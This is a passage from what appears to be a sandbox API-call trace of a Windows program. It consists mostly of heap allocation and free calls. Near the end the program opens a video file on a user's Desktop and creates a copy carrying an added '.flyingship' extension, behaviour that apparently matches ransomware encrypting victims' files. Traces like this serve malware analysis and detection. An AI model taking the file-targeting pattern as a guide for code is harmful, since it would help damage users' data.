hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0167.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.742] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0167.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0167.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0167.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0167.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0167.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.745] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0167.745] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0167.745] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0167.745] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0167.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0167.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0167.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0167.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tteahk_e6.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0167.748] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.748] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0167.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0167.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0167.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0167.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.748] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0167.748] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0167.748] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0167.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0167.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0167.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0167.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0167.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flyingship.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tteahk_e6.flyingship.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0167.754] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0167.754] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.754] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0167.754] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0167.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0167.754] RtlAllocateHeap 